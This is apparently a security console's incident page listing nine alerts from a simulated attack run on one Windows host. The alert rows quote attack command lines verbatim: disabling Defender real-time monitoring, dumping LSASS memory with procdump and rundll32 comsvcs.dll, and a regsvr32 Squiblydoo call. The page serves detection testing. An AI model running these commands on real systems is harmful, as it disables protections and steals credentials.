Back to list

Critical CINC-20251221-6C5C00F0 new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:9124699537

Incident Overview

Incident ID CINC-20251221-6C5C00F0
Severity Critical (90)
Status new
Alert Count 9
Host Count 1

Timeline

First Seen 2025-12-22 03:52:32
Last Seen 2025-12-22 03:53:42
Duration 0d 0h 1m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Credential Access Defense Evasion
Techniques:
User Execution PowerShell OS Credential Dumping Rundll32 Regsvr32

Affected Hosts (1)

TEAHEE

Related Alerts (9)

Severity Status Hostname Description Tactic Command Line Time
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 03:53
High new TEAHEE A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableRealtimeMonitoring $true" 12-22 03:53
High new TEAHEE An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" 12-22 03:53
High new TEAHEE An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" 12-22 03:53
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-22 03:53
Critical new TEAHEE A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree. Credential Access rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-22 03:53
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" 12-22 03:53
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-22 03:53
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 03:52